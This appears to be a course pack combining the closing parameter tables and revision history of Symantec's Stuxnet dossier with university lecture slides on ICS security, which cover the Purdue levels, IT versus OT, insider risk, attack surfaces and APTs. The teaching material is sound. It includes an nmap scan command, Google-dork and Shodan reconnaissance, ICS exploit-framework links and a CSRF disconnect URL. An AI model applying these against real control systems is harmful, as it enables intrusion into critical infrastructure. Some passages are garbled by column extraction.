120 85 motor cos phi
605 2850 U/f curve/ middle point voltage
603 3000 voltage at field weakening point
604 40
1519 1
102 2
717 110 Automatic restart/ Wait time
718 120 Automatic restart/ Trial time
721 10 Automatic restart/ Number of tries after
overvoltage trip
722 3 Automatic restart/ Number of tries after
overcurrent trip
301 0 DIN3 function
313 0 RO1 function
314 0 RO2 function
Page 65
W32.Stuxnet Dossier
Security Response
Table 15

timotor) ?
104 19990 deceleration time 1 ?
503 19990 deceleration time 2 ?
504 1 brake chopper
504 4 brake chopper
0 0
0 0
506 1 stop function
0 0
Frames 2.2
506 0 stop function
125 3 control place
0 0
0 0
0 0
102 1064
108 2 U/f ratio selection
111 1064
604 50
603 10000 voltage at field weakening point
605 1000 U/f curve/ middle point voltage
606 330 output voltage at zero frequency
0 0
812 12 ?
516 0 DC-braking time at start
505 0 start function
Page 66
W32.Stuxnet Dossier
Security Response
Table 15

timotor)
0 0
0 0
812 12 ?
0 0
Page 67
W32.Stuxnet Dossier
Security Response
Revision History
Version 1.0 (September 30, 2010)
• Initial publication
Version 1.1 (October 12, 2010)

• Added Windows Win32k.sys Local Privilege Escalation (MS10-073) section.
• Updates to Modifying PLCs section, based on MS10-073.
• Other minor updates.
Version 1.2 (November 3, 2010)

• Added Behavior of a PLC infected by sequence A/B section.
Version 1.3 (November 12, 2010)

• Updated the Modifying PLCs section.
• Added Appendix C.
Version 1.4 (February 11, 2011)

• New content added to the Infection Statistics, The monitor thread, Sequence C, and Variants sections.
• Minor edits and updates to Configuration Data Block, Behavior of a PLC infected by sequence A/B, and Other
export hooks sections.
Page 68
Security Response
Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec
Corporation.
NO WARRANTY . The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the
technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical
errors. Symantec reserves the right to make changes without prior notice.
About Symantec
Symantec is a global leader in
providing security, storage and
systems management solutions to
help businesses and consumers
secure and manage their information.
About the authors
Headquartered in Cupertino, Calif.,
Nicolas Falliere is a Senior Software Engineer,
Liam O Murchu is a Development Manager, Symantec has operations in more
and Eric Chien is a Technical Director than 40 countries. More information
within Symantec Security Response. is available at www.symantec.com.
For specific country offices and contact num- Symantec Corporation Copyright © 2011 Symantec Corporation. All rights reserved.
Symantec and the Symantec logo are trademarks or registered
bers, please visit our Web site. For product World Headquarters trademarks of Symantec Corporation or its affiliates in the
information in the U.S., call 20330 Stevens Creek Blvd. U.S. and other countries. Other names may be trademarks of
their respective owners.
toll-free 1 (800) 745 6054. Cupertino, CA 95014 USA
+1 (408) 517 8000
1 (800) 721 3934
www.symantec.com
Critical System
Security
Week 2 – People, Roles and
Responsibilities. IT Vs ICS
Where are we so far?
• Week 1 - we introduced the

PURDUE module, investigating
common sensors and actuators.
PURDUE Level recap
• Five Levels,
• Level 4 - Business network (traditional security needs)
• Level 3 - Plant wide control network
• Level 2 - Process/Cell/Line supervisory
• Level 1 - Process/Cell/Line Controllers (PLC)
• Level 0 - Process/Cell/Line sensors and actuators (field devices)
• Remember the purpose of PURDUE is to reduces complexity

This weeks objectives
• This weeks lecture:

• People
• Differences within IT and ICS
security
• Challenges in cyber security

• This weeks tutorial:
• Seminar – OT vs IT, security
frameworks
• Programming a PLC
What is an Industrial Control System?
SCADA
From a cyber-security perspective:
- Enterprise zone (CIA)


- Control zone (Safety and Reliability)

- Control zone (Safety and Reliability)
- Field zone (Safety and Reliability)
Safety and reliability in ICS
•Field devices in critical infrastructure are designed as safety-critical, fault-

tolerant systems - provide availability, reliability, safety. Impact on design and
maintenance.
•Systems where the consequences of failure are high must be dependable

systems; follow these approaches:
• Fault avoidance - avoid faults by design, i.e., build the system correctly from the
beginning
• Fault removal - reduce, by verification and testing the presence of faults
• Fault tolerance - provide correct function despite presence of faults
Fault Tolerance
NASA Space Shuttle Program
30 years of missions.
135 Missions Flown - 852 Fliers
• Mated Pairs (Duplication Remove SPF)
A-B
AXB
• Software Running on Multiple processors
• N-versions written by different
programming teams.
• Quorum Voting (majority)

ICS PROFESSIONALS Roles and responsibilities
• It is important that we understand the roles of people. Having Separation of

Responsibilities also helps to reduce risks.
• Process Engineer: designs and optimises the processes used in the

control environment
• Field Technician: maintains the field devices

• Programmer: codes each steps of the process, and deploys to controller
• Operator: Manages/oversees the controlling of the process
ICS ORGANISATION Roles and responsibilities
• Owner/Operator: purchase and uses the system, responsible for the safe
operation and meeting regulations
• Vendor: Manufacture equipment and software, design and build the

components used within controls systems.
• Integrators: Design, configure, test, train and refresh, responsible for

selecting, creating and configuring a control system
• Government: Guidance and regulation, responsible to safeguard the public

Segregation of Duties
• One person may not perform the duties for more than one role where
there could be a conflict of interest
• Limit scope that individual has to attack, or perform system misuse.
• Limit dependence that organisation has on any one individual.

Insider Risk
Insider risk refers to threats from individuals within the organization, (employees, etc)
1. Data Theft or Leakage: Intentionally or accidentally leaking sensitive information. Malicious intent, (selling
trade secrets), or through carelessness, like sending confidential data to the wrong person.
2. Fraud: Employees might engage in fraudulent activities for personal gain, such as embezzling funds or
manipulating financial reports.
3. Sabotage: Disgruntled insiders may intentionally damage company property, disrupt operations, or impair
the organization's data systems.
4. Intellectual Property Theft: Employees with access to intellectual property might steal it for personal use
or to sell to competitors.
5. Compliance Violations: Insiders might inadvertently or deliberately violate regulatory requirements,

leading to legal issues and penalties for the organization.
6. Misuse of Resources: Using company resources for unauthorized or personal purposes.

Insider Risk
Threat Actor
Intentions Capabilities
Threat
Threat Vulnerability
Likelihood
Likelihood Impact
Personnel Vetting
Background check and evaluation of staff before they are given access to anything sensitive
The process aims to assess the trustworthiness, reliability, and integrity of potential and
existing employees or contractors.
1. Background Checks: This includes verifying personal information, educational

qualifications, employment history, and any criminal records. Background checks help
ensure that an individual does not have a history that could indicate a potential risk.
2. Reference Checks: Contacting previous employers and references to get insights into the
individual's work ethic, behaviour, and integrity.
3. Security Clearance: For positions involving access to highly sensitive information, a

security clearance process This often involves a more in-depth background check and
possibly even interviews with friends and family.
Martin, P., 2023. Insider risk and personnel

security: An introduction. Taylor & Francis.
Personnel Vetting
1. Psychological Assessment: Some organizations conduct psychological assessments to evaluate an individual's suitability,
particularly for high-stress or high-security roles. This can help identify any behavioural traits that might pose a risk.
2. Financial Checks: Financial background checks can be important for roles that involve financial responsibilities. Financial distress
could motivate insider threats such as fraud
3. Training and Awareness: Ensuring that all personnel are aware of the organization's policies, ethical standards, and the
importance of security can help mitigate risks.
4. Access Control: Limiting access to sensitive information and areas to only those who absolutely need it, based on their role and
clearance level.
5. Legal and Regulatory Compliance: Ensuring that the vetting process complies with all relevant laws and regulations, including
privacy laws and anti-discrimination legislation.
6. Culture of Security: Fostering a workplace culture that values security and ethical behaviour can also help mitigate insider risks.
•
Worst Case
• What’s the worst thing an insider could do to the company?
This Photo by Unknown Author is licensed under CC BY-SA

Maliciousness
1. Intentionality (Malicious vs. Non-Malicious):
1.Malicious Insiders: These individuals have intentional, harmful motives against the
organization. They might engage in activities like theft, sabotage, espionage, or fraud.
2.Non-Malicious Insiders: These are insiders who cause harm unintentionally. This
could be due to negligence, lack of awareness, or accidents. For example, an employee
might accidentally leak sensitive data by sending it to the wrong recipient or falling prey
to a phishing attack.
Operational and Information Technology in ICS
A modern ICS is a complex system that depends on many different components

and technologies to monitor and control physical processes.
Identifying the key differences between information technology (IT) and

operational technology (OT) is vitally important in order to understand the
challenges in securing an ICS [1]
What is OT and IT?

Information Technology (IT)
The technology involving the development, maintenance, and use of

computer systems, software, and networks for the processing and
distribution of data [1]
Operational Technology (OT)
Hardware and software that detects or causes a change through the direct
monitoring and/or control of physical devices, processes and events [1]
Identifying the key differences between information technology (IT) and

operational technology (OT) is vitally important in order to understand the
challenges in securing an ICS [1]
1) IT and OT differences are found across the operational, technical and managerial
domains of the system.
2) We have specific security controls in each domain.
3) The differences in each domain introduce unique security challenges and constraints.
Before we analyse these challenges, let’s discuss the security controls in each domain in a
traditional IT system.
ISO27001
• ISO 27001 (formally known as ISO/IEC 27001:2005) is a specification
for an Information Security Management System (ISMS).
• An ISMS is a framework of policies and procedures that includes all

legal, physical and technical controls involved in an organisation's
information risk management processes.
• The ISMS should fully detail all documentation, policies, practices, and
all other aspects of information assurance, in order to support the
business operation.
ISO 27001 Annex A
Controls are deliberately vague so that they can be implemented in different ways.
• Organizational Controls
• People Controls
• Physical Controls
• Technological Controls
This Photo by Unknown Author is licensed under CC BY-
BSI (2022) Cybersecurity ISO 27001: Cybersecurity ISO 27001. British Standards Institute.
Status: Current | Published 31/12/2022
Permalink : https://uwe.primo.exlibrisgroup.com/permalink/44UWE_INST/52fmuk/cdi_bsi_primary_000000000030452923
Security Controls in short
Security controls help reduce risks in an organisation. Attempt to prevent or

limit the impact of a security incident [2].
1) Technical controls use technology

2) Management controls use administrative or management methods
3) Operational controls are implemented by people in day-to-day operations
4) Compliance controls, e.g. privacy, laws and clauses
1) Technical Security Controls
A technical control is one that uses technology to reduce vulnerabilities. An

administrator installs and configures a technical control, and the technical control then
provides the protection automatically [2].
- Encryption. Protect the confidentiality of data transferred over a network and data
stored on devices.
- Antivirus software. Protection against malware infection.
- Intrusion detection systems (IDSs). Monitor a network or host for intrusions.
- Firewalls. Restrict network traffic going in and out of a network.
2) Management Security Controls
Management controls use planning and assessment methods to reduce and

manage risk. Many provide an ongoing review of an organization’s risk
management capabilities [2].
- Risk assessments. Quantify and qualify risks within an organization so that

the organization can focus on the serious risks.
- Vulnerability assessments. Discover current vulnerabilities or weaknesses.
- Penetration tests. These go a step further than a vulnerability assessment by
attempting to exploit vulnerabilities.
3) Operational Security Controls
Operational controls help ensure that day-to-day operations of an organisation

comply with their overall security plan [2].
- Awareness and training. Helps users maintain password security, follow a clean desk policy,
understand threats such as phishing and malware, and much more.
- Configuration and change management. Ensure that systems start in a secure state. Ensure
that changes don’t result in unintended configuration errors.
- Contingency planning. The goal is to reduce the overall impact on the organisation if an outage
occurs.
- Media protection. Media includes physical media such as USB flash drives, external and internal
drives, and backup tapes.
- Physical and environmental protection. Cameras, door locks, and environmental controls such
as heating and ventilation systems.
Differences between IT and OT
Operational Technical Managerial
Operational Embedded
Long Lifecycles
Long Lifecycles
Objectives Systems
Network Finances/
Finances/
Protocols Investments
Investments
High Availability
Real-time Vendors
Vendors &
and
Performance Procurement
Procurement
Geographic Legacy Managerial
Managerial
Location Technologies Domains
Domains
Differences between IT and OT
Factors that influence the differences between IT and OT
IT Security OT Security
Data Data
• Integrity • Integrity
• Confidentiality • Confidentiality
• Availability • Availability
Physical Process
• Safety
• Environment
• Dependencies
• Regulation
Operational differences between IT and OT
Examples of foundational ICS objectives include:
Operational • maintaining profitable margins,
• minimising the safety or environmental impacts,
• limiting damage or wear to physical assets,
• managing broader society dependences on the ICS.
Operational
Objectives
Cybersecurity is an important property to support many of these
objectives; however, it is usually not a main operational objective. The
organization must balance the importance of cybersecurity with respect to
High many other operational challenges.
Availability
- Safety (1999 Bellingham, WA gasoline pipe leak)

Geographic - Environmental (2010 Australia sewage plant ICS failure)
Location - Societal Dependencies (2003 Northeastern U.S. power outage)
- Physical Infrastructure (2010 Stuxnet)
Examples of ICS with high availability requirements:
Operational
Electric power grid, water/gas systems and manufacturing
Systems (can only be down for 5 to 50 min during a year).
Operational
Objectives
This affects:
High
- Security updates/patches
Availability
- Security assessment
Geographic
Location
- “Fail-closed/Deny access” security mechanisms
High
Availability
Five Nines
99.999%
5 ½ mins a year
Geographic dispersion creates problems implementing physical system
protections, leaving the system vulnerable to physical tampering.
Operational
If an attacker can tamper with a remote device, they could

manipulate the control of that device, spoof measurement data
Operational originating from the device, or gain access to system data. They can
Objectives often obtain data (passwords and cryptographic keys) important to
accessing other system resources.
High Distributed systems also present system management challenges

Availability since operators and engineers cannot always physically access the
system. They must implement remote administration interfaces to
perform these functions from a central location.
Geographic
Location
Technical differences between IT and OT
Key differences:
Technical
- Unique communication protocols and architectures,

Embedded - Real-time performance demands,
Systems - Dependence on resource constrained embedded
devices,
Network
Protocols - Domains specific device manufactures and integrators,
- Complex integration of digital, analog, and mechanical
Real-time controls.
Performance
Legacy
Technologies
Embedded systems have resource constraints, such as,
limited processing power, storage, and bandwidth.
Technical
- Systems with limited memory and processing power often

Embedded cannot support certain security mechanisms, such as intrusion
Systems detection or anti-virus software.
- Performing realtime system operations complicate the
Network scheduling of system processes, leaving very little time to
Protocols
schedule security related tasks.
Real-time - Security mechanisms also increase the power consumption,
Performance thereby, directly reducing the lifespan of devices depending on
battery power.
Legacy
Technologies
Technical
IT OT
Embedded HTTP, DNS,

Modbus, EtherCat,
Systems Protocols SSH, SMTP,
BACnet
NTP
Network
Protocols Analog, binary
Data Large payloads
values
Real-time
Performance Recently
Security Still emerging
developed
Legacy
Technologies
Technical Communication latency is extremely important
Embedded
Systems
IEC 61850 communication latency requirements;
Network from 3 to 500ms depending on message type.
Protocols
Real-time
Performance 2048 bit RSA cryptographic operation adds 61.04ms.
Legacy
Technologies
Legacy systems traditionally do not have sufficient security mechanisms to
protect against many modern threats.
Technical
Legacy network protocols typically lack support for encryption and

authentication of messages sent across untrusted networks.
Embedded
Systems
On the software side, these systems often lack user authentication, access
Network control, and auditing capabilities.
Protocols
Real-time Often have not undergone rigorous security testing during their design to
Performance verify they don’t have security vulnerabilities or backdoors.
Legacy
Technologie VPNs and firewalls can encapsulate the legacy devices and implement
s required security functions
Managerial differences between IT and OT
Large costs to procure, deploy, and integrate the
Managerial various systems (relays in power system are
typically expected to operate for over 20 year)
Long
Lifecycles
- Difficult to address evolving cyber threats
Finances/
Investments
Vendors &
Procuremen - Dependencies on unsupported systems (Windows
t XP is still used in ICS)
Managerial
Domains
• The revenue structure of an ICS is often based on
Managerial fixed service rates, such as public utilities, that
have limited control over their budget for
cybersecurity.
Long
Lifecycles
Finances/ • Government body may regulates utility cost not

Investments
taking into account security; lack of expertise
Vendors &
Procuremen
t
Managerial
Domains
ICS domains also have product vendors and system
procurement processes that different from IT environments.
Managerial
Reported vulnerabilities often go unpatched; and in the

Long case that a patch is available, it often cannot be applied
Lifecycles
due to concerns that it will impact system availability.
Finances/
Investments
System updates often have to undergo additional testing to
Vendors & verify the work reliability the unique configurations and
Procurement other OT software platforms.
Managerial
Domains
Unique staff focussing on IT and OT.
Managerial
Can create conflict over who has managerial responsibility
over the different systems and software deployed in the
Long ICS.
Lifecycles
Finances/
Investments Because the OT components will often also include some
Vendors &
commodity IT technologies, the IT staff could negatively
Procuremen impact the operation of the ICS by performing an incorrect
t configuration or adding a potentially problematic patch.
Managerial
Domains
Convergence of IT technologies into ICS
Current trends are creating a convergence of these domains.

- technological advances
- pressure to reduce operating cost
For example: Many ICS protocols, such as DNP3, originally operated over serial
networks (i.e. RS-232), but are now commonly based on IP.
While these trends provide a number of advantages, they also introduce an

undetermined amount of risk to the ICS.
Distributed Control System
(DCS)
• Introduced in 1975
• Custom-designed for a plant, controllers
running proprietary protocols.
• Often found in Perdue Level 1, connecting

directly to field devices Purdue level 0 and
HMIs Purdue Level 2
• Usually designed with redundancy built in.

• Co-operatively control complex process
within a site
• Complete with PLC solutions

Programmable Logic Controller
(PLC)
• Created to increase flexibility and

decrease the proprietary nature
of custom solutions
• Programmable by an engineer
• Reprogrammable
• Expandable
Basic IO
• Digital
• Voltage often Boolean, (present /absent)
• Sensors, position, state
• Actuators, stepper motor, relay
• Represented binary, or boolean expressions
• Analog
• Value is a range 0-24v or impedance
• Sensors dial, speed, flow, pressure
• Actuator, variable speed,
• Represented as integers or floating points
Controller Logic - the basics
• Setpoint (SP)
• Process Value (PV)
• Manipulated Variable (MV)
• Error (E = Difference between PV and SP)
• Using a PID Algorithm we can begin to
define the process
• Proportional Term - Size of the error

• Integral Term - Duration
• Derivative Term - rate of change
Define the logic
We started this last week (week 2)
• Start with the degrees of truth,

• Consider a twin tap,
• If flow is too low (PV<SP), then increase
water valves
• If flow is too high (PV>SP), then

decrease water valves
• If temperature is too low (PV<SP) then

increase hot, decrease cold
• If temperature is too hot (PV>SP) then

increase cold, decrease hot
PID Theory
Programming Final Logic
• Typically ICS run realtime systems and rely on

firmware.
• IEC61131-3 defined 5 programming approaches:
• Ladder Logic - designed for technicians
• Function Block - blocks with purpose are sown

together to gain desired I/O
• Structure Test - written in statements similar to C
• Instruction List - similar to Assembly language,
• Sequential Function Chart

Smart field devices
• Categorised as
• Industrial Internet of Things (IIOT)
• Has a defined, limited function
• Usually controlled using a Micro Controller
• Contains logic which cannot be changed
• Examples:
• Phasor measurement unit (PMU)
• Smart meters
Todays Tutorial
• Discussing details from todays lecture. Discussing the application of security

techniques to a typical ICS topology.
• Extended activity - Practical lab, Programming a PLC within a VM (instructions

can be found on Blackboard)
Reading
• CyBOK Physical Systems Security {to page 30]

References
[1] Colbert, E.J.M., Kott, A. & SpringerLink (Online service) 2016, Cyber-security of SCADA and Other
Industrial Control Systems, Springer International Publishing, Cham.
[2] https://blogs.getcertifiedgetahead.com/security-controls-implementation-3-of-3/ [Retrieved on

14/01/2019]
Next week
• Lecture
• Networking protocols and
design principles
• Tutorial:
• Control Systems, HMI
Attack Vectors
Dr Andrew McCarthy
Recap
• Levels 0-4
• Scada
• Protocols
Protocols
Protocol
Physical Layer Comms + Pwr DataRate No Devices DataLink Layer Control in field P2P Alerts Timestamp
Modbus - 1979 IEEE 1452.2, 9.6Kb

247 NONE
TIA-485 s-12Mbs
Hart - 1986 BELL 202 4-20mA 1.2Kps-9.6Kps 1-64 NONE X
IEEE 1452.2,
PRODIBUS DP 9.6Kbs-12Mbs 247 IEC 61158
TIA-485
PROFIBUS PA IEC 61158 X 31.25Kbs 32 IEC 61158 X
IEC 8802,
PROFINET 100Mbs, 1Gbs unlimited IEC 8802 X
IEEE802.3
FOUNDATION
IEC 61158, ISA IEC 61158, ISA
FIELDBUS H1 X 31.25Kbs 32 X X X X
SP50 SP50
ISA/ANSI
FOUNDATION IEC 8802, IEEE

100Mbs, 1Gbs unlimited IEC802 X X X X
FIELDBUS HSE 802.3
SCADA Technologies
Satellite communications
• There are many satellite communications, two common technologies are

• Very Small Aperture Terminal (VSAT) - fixed - provides data, video and voice.
Operates in C-Band (4-8GHz) and Ka-Band (12-18GHz) - terrestrial satellite
• Broadband Global Area Network (BGAN) - mobile Low power - supports data
and voice - geostationary satellites. L-Band (1.5-1.6GHz), Latency 1-1.5
seconds
SCADA Technologies
RF Mesh Technologies
• Allows participating devices to routes data from other devices.

• Technologies include, ZigBee, WirelessHART. ISA100.11a
• WirelessHART make up about 50-80% of Wireless ICS
• Operates at 2.4GHs, support channel hopping, secured using keys to prevent spoofing
• ISA100.11a, simulate to WirelessHART, however supports IPv6, can tunnel legacy
protocols, utilises subnets. There was a committee to converge ISA and WirelessHART
into a single standard, however, this was abandoned.
• ZigBee, operates similarly to bluetooth, low power, but supports security such as AES,
each devices has a unique key.
Todays session
• Lecture
• Looking at vulnerabilities, attack surfaces and trees.
• Tutorial
• Seminar: Stuxnet
• Investigate attack surfaces
• Advanced Persistent Threats (APT)
Vulnerabilities to SCADA
Systems
Threats
Suitable definitions of threats for ICS
The former ISO22399 2007 - Guideline for incident preparedness and operational continuity management:
“potential cause of an unwanted incident, which may result in harm to individuals, a system or organization, the
environment or the community”.
ISO 22313:2014 on Societal security – business continuity management systems:

“events or actions that could at some point disrupt activities and resources (e.g. threats such as fire, flood, power
failure, staff loss, staff absenteeism, computer viruses and hardware failure)”
NIST SP 800-82 (source: NIST SP 800-53) defines threat as: Any circumstance or event with the potential to
adversely impact agency operations (including mission, functions, image, or reputation), agency assets, or
individuals through an information system via unauthorized access, destruction, disclosure, modification of
information, and/or denial of service.
ISO/IEC 27000 defines threat as the “potential cause of an unwanted incident, which may result in harm to a
system or organization”
Many ICS threats stem from differences between IT and OT.
- Combination of legacy technologies with contemporary off-the-shelf

technologies (e.g. connection of ICS to the Internet)
- Lack of cyber security awareness in OT
- Increased cost of security
- etc.
Vulnerabilities - Definition
• A vulnerability is a weakness in a system which could be exploited by a threat.

• Not only software, but also physical security, HR practices etc.
• Zero Day Attacks are a commonly exploited vulnerability
Vulnerability Identifiers
• Categories of Vulnerabilities for Cyber systems are generally defined by

Common Weakness Enumeration (CWE)
• cwe.mitre.org
• Specific vulnerabilities in specific systems are identified by Common
Vulnerabilities and Exposures (CVE)
• nvd.nist.gov/vuln/search
• cvedetails.com
Attack surface
• The totality of all vulnerabilities in connected hardware and software which can
be accessible to unauthenticated users.
Attack surface
Information leaks
• Information leaks can expose control systems to the public via the internet
• There are a few methods utilised by attackers to identify these systems
• Port scanning [can be tracked back to attackers IP] (nmap) [sudo nmap -p- -
A 127.0.0.1]
• Google searches (exploit-db.com/google-hacking-database)

[site:domain.com command] proceed with caution, Look, but do not attempt
to access any returned sites.
• Shodan serach
Attack surface
Other information online
• Organisational maps, sharing email addresses (conventions), contacts and

relationships
• Third parties, suppliers, associations, regulators and customers

• Assets, names, locations, layouts, utilities (floorpans are really helpful to
attackers)
ICS threats
Shodan.IO
ICS knowledge and documentation on ICS services, ICS protocols and their
weaknesses is widely available on the internet.
Shodan was launched in 2009.

According to Bodenheim et.al
(2014) Shodan indexed and
identified all four PLCs,
deployed for the purposes of the
experiment, within 19 days [2].
https://www.shodan.io/
ICS Threats
Shodan
• Indexes banners and service headers, unlike google which indexes content.
• Allows attackers to identify services running in an environment
• Can take around 19 days to detect new systems
• Provides the same information as nmap, but remember nmap is traceable
back to the originating IP
• shodan.io/explore/category/industrial-control-systems
ICS threats
Industrial Exploitation Famework, similar to Metasploit
ICS knowledge and documentation on ICS services, ICS protocols and their
weaknesses is widely available on the internet.
ISF (Industrial Exploitation

Framework) is an exploitation
framework based on Python, it's
similar to metasploit framework.
https://github.com/dark-lbp/isf
ICS threats
ICSSPLOIT
BlackHat 2011 - Siemens S7 PLC Exploitation with Metasploit:

https://www.youtube.com/watch?v=33kouEKm0zo
Shodan and ICSSPLOIT …
Remember all the differences between IT and OT…

ICS Threat landscape
• In the period from 1982 to 2000 only 31% of all security incidents against ICSs
were identified as externally generated incidents.
• In the period from 2001 to 2003 external generated incidents accounted for
70% of all security incidents, as a result of the use of emerging technologies
(e.g. wireless networks, connection to the Internet etc.) [1]
ICS Threat landscape
Security for Industrial Control Systems Framework Infographic by NCSC [3]

ICS threats
The main threats to national security are terrorism, espionage, cyber threats and
the proliferation of weapons of mass destruction, many of which impact on the
UK’s national infrastructure [4].
Source: https://www.cpni.gov.uk/national-security-threats
Common Level 0/1 attacks
• Attack surface of
• Physical components
• Real Time OS
• Applications - carry a range of vulnerabilities
• Communications
• Supply chain
• People
Common Level 2 / 3 Attacks
• Level 2/3 subjected to many common attacks.

• Phishing
• Malware
• Viruses
• Social Engineering
• Net attacks
• Eves-dropping
• DDOs
• Masquerading
Level 2 / 3 targets
• Level 2 and 3 devices are targeted more often as they:

• Use common protocols such as TCP/IP
• Connected to the process through HMI
• Technicians workstations typically have a holistic context of the ICS process,
including project files
• Access is often remote, through the ISP and work through to the control
network exploring trust relationships between servers.
Common Attacks
• SQLi Attacks
• Session Management
• Authentication bypass
• Cross site requests
• Passwords and password practices
Authentication bypass
• Most systems have authentication control, requiring a user to authenticate

(typically with a username or password),
• Occurs when authentication is incorrectly implemented,

• for example on a website where the developer fails to verify whether the
user is still logged in.
Weak session management
• Once a user authenticates on a system, the system usually issues a session

token and a cookie
• This cookie is passed back and forth to verify your credentials

• If the cookie was intercepted it could be used to gain access to that system
SQL Injection
• SQLi attacks are more common than they should be, with a few large names
falling victim
• Most data systems link to a backend database

• If the databases are not configured correctly, attackers can add SQL
commands within the input fields, which the database will run.
• These attacks allow an attacker to read and write to the database, as well as
interact with the OS and files.
Cross-site scripting XSS
• Exploiting input fields on a site, such as a search field

• Allows the attackers to add JavaScript into an input field and have it execute
on browser,
• XSS exploits the browser, and has the ability to do anything to the users
browser, if this is a web application then it has potential to issue control singles
or make configuration changes.
Cross-site Request Forgery (CSRF or XSRF)
• This exploit relies on the principle that the user had authenticated.
• Often a SE attack, the attacker sends the user a link to website similar to the
one below.
• ‘http//hmi.tesla.com/disconnect?customer=987'
• What if that was a smart meter, of a gantry on a smart motorway?
• If you have an active cookie session then you could disconnect a customers
car
• CSRF tokens are used to limit these types of attacks

Passwords (Default)
• Many systems are still protected by passwords, and most have a default
support or admin account / password
• Default passwords are often available within vendor documentation (think

about your wireless access point)
• Due to constraints with resources, there may be a single password which is

shared with multiple users
• Its quit common to come across passwords which are hardcoded and cannot
be changed
Attack methods
How can a spear phishing attack be used against an ICS?
https://www.youtube.com/watch?v=uVAQT_dBEec
Step 1: Open Source Intelligence (OSINT) and identify the spear phishing targets
and their emails
Step 2: Find an organization to perform the spear phishing.
Step 3: Find ICS asset owners to participate. They would get the OSINT, spear
phishing and analysis at no charge. All results would be anonymized to the asset
owner’s satisfaction.
Result of research: 25% of ICS employees fell victim to spear-phishing

attempts
Attack methods – Spear Phishing
Modelling attacks
Attack Models and Surface
Attack actors
• Autonomous attackers
• Criminal groups
• Foreign intelligent services
• Insiders Incentive?
• Terrorists
• Industrial espionage Can we distinguish the actor?
Attack methods
Traditional IT systems-based cyber-attacks (e.g. viruses, worms, spear phishing, social

engineering, botnets, rootkits, trojan horses, DDoS etc.)
Spreading mechanisms: emails, USBs, insider threat etc.
Exploit ICS software vulnerabilities (ICSSPLOIT)
Goal: Reprogram controllers

Attack tree
• An attack tree is a formal, methodical way fo describing the security of a

system.
• Should be kept simple (Not possible to produce an exhaustively models of all

attacks and risks)
• Representing the attacks against the system in a tree structure, with the goal
of the attack at the root
• Allowing us to better understand where we may need additional controls.

• Attack tree are subjective subjective and should focus on a specific risk
Attack Tree - example
F.Santini (2011)
Tutorial
• Take a look at the CVE and CWE, Shodan.io, GHdB; review the returned hits
describe an overview of the top few results
• NOTE: Do not attempt to access/authenticate into any systems in which

you do not have permission
• Identify the attack surface for a company of your choosing, what information
are you hoping to find, keep a note of tools and methods you utilise.
• Discuss on Stuxent - 30 mins (assuming you have done the reading)

Advanced Persistent Threats (APT)
Advanced: They are targeted. They may employ more than one attack methods
and multiple spreading mechanisms to increase the probability of a successful
attack on the target.
Persistent: They operate in stealth mode for a prolonged period of time until
they reach the final target. Often they hide their actions from monitoring
software.
The six steps of an APT (FireEye [5])
1) The cyber criminal, or threat actor, gains entry through an email, network,
file, or application vulnerability and inserts malware into an organization's
network. The network is considered compromised, but not breached.
2) The advanced malware probes for additional network access and

vulnerabilities or communicates with command-and-control (CnC) servers to
receive additional instructions and/or malicious code.
3) The malware typically establishes additional points of compromise to

ensure that the cyber attack can continue if one point is closed.
4. Once a threat actor determines that they have established reliable network
access, they gather target data, such as account names and passwords.
Even though passwords are often encrypted, encryption can be cracked.
Once that happens, the threat actor can identify and access data.
5. The malware collects data* on a staging server, then exfiltrates the data off
the network and under the full control of the threat actor. At this point, the
network is considered breached.
6. Evidence of the APT attack is removed, but the network remains

compromised. The cyber criminal can return at any time to continue the data
breach.
References
• Santini. F. 2011, “Evaluation fo Complex Security scenarios using defence trees and economic indexes”,
journal of Experimental & Theoretical Artificial Intelligence, no. 24, pp1-32.
• Byres, E. and Lowe, J., 2004, October. “The myths and facts behind cyber security risks for industrial control
systems”. In Proceedings of the VDE Kongress (Vol. 116, pp. 213-218).
• Bodenheim, R., Butts, J., Dunlap, S. & Mullins, B. 2014, "Evaluation of the ability of the Shodan search engine
to identify Internet-facing industrial control devices", International Journal of Critical Infrastructure Protection,
vol. 7, no. 2, pp. 114-123.
• https://www.ncsc.gov.uk/guidance/security-industrial-control-systems [Accessed on 13/02/2019]

• https://www.cpni.gov.uk/national-security-threats [Accessed on 13/02/2019]
• https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html [Accessed on 14/02/2019]
• https://www.symantec.com/content/en/us/enterprise/media/security_
response/whitepapers/w32_stuxnet_dossier.pdf [Accessed on 15/02/2019]
UFCF7P-15-M Critical Systems
Security
The Cyber Kill Chain model
This week
• Intelligence-driven computer network defence

• The kill chain model
• Indicators
• Course of action
• Campaign analysis
Advanced Persistent Threats
Advanced: They are targeted. They may employ more than one attack methods
and multiple spreading mechanisms to increase the probability of a successful
attack on the target.
Persistent: They operate in stealth mode for a prolonged period of time until
they reach the final target. Often they hide their actions from monitoring
software.
1) The cyber criminal, or threat actor, gains entry through an email, network,
file, or application vulnerability and inserts malware into an organization's
network. The network is considered compromised, but not breached.
2) The advanced malware probes for additional network access and

vulnerabilities or communicates with command-and-control (CnC) servers to
receive additional instructions and/or malicious code.
3) The malware typically establishes additional points of compromise to
ensure that the cyber attack can continue if one point is closed.
4. Once a threat actor determines that they have established reliable network
access, they gather target data, such as account names and passwords.
Even though passwords are often encrypted, encryption can be cracked.
Once that happens, the threat actor can identify and access data.
5. The malware collects data* on a staging server, then exfiltrates the data off
the network and under the full control of the threat actor. At this point, the
network is considered breached.
6. Evidence of the APT attack is removed, but the network remains

compromised. The cyber criminal can return at any time to continue the data
breach.
APT Risk - the need for a new approach
• Technical security controls (IDS, antivirus software etc.) focus on the

vulnerability component of risk.
• APTs: Well-resourced and trained adversaries conducting multi-layer intrusion

campaigns, targeting highly sensitive economic, proprietary or national
security information [1].
Knowledge Information Decrease

about superiority/ likelihood
adversaries Intelligence of success
Intelligence driven computer network defence model

• Intelligence-driven computer network defence is a risk management strategy that addresses

the threat component of risk, incorporating analysis of adversaries, their capabilities,
objectives, doctrine and limitations.
• New understanding of the intrusions themselves, not as singular events, but rather as phased
progressions [1].
• Kill chain model – the basis of intelligence-driven computer network defence
• Kill chain analysis illustrates that the adversary must progress successfully through each
stage of the chain before it can achieve its desired objective; just one mitigation disrupts the
chain and the adversary [1].
• Objectives:
